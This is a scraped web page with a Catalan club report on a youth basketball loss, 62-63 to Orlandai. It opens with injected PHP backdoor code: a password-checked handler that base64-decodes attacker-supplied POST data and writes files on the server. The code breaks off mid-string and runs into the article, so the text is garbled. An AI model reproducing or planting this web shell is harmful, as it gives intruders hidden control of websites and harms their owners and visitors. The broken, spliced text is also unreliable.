function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A es mostra molt irregular i perd contra l'Orlandai (62-63) - Tgn Bàsquet Club -

L’infantil masculí A es mostra molt irregular i perd contra l’Orlandai (62-63)

Updated: maig 21, 2019

L’infantil masculí A va perdre un partit que tenia controlat durant molts moments. El conjunt lila, que una vegada més va patir l’handicap de ser molt inferior físicament al seu rival, va combinar minuts de molt bon joc amb altres de desconcert i això va facilitar la victòria del seu rival, l’Orlandai. Així, la bona defensa dels tarragonins els va permetre gaudir d’un avantatge de 21-8 en el minut 13 i de 40-31 al minut 25 però tota la feina feta se’n va anar en orris per culpa de badades defensives i, sobretot, de falta de contundència en el rebot defensiu. En els últims cinc minuts de partit, la defensa dels visitants, molt tancada, va ofuscar l’atac del TGN Bàsquet que, alhora, no van saber defensar tant bé com en minuts anteriors.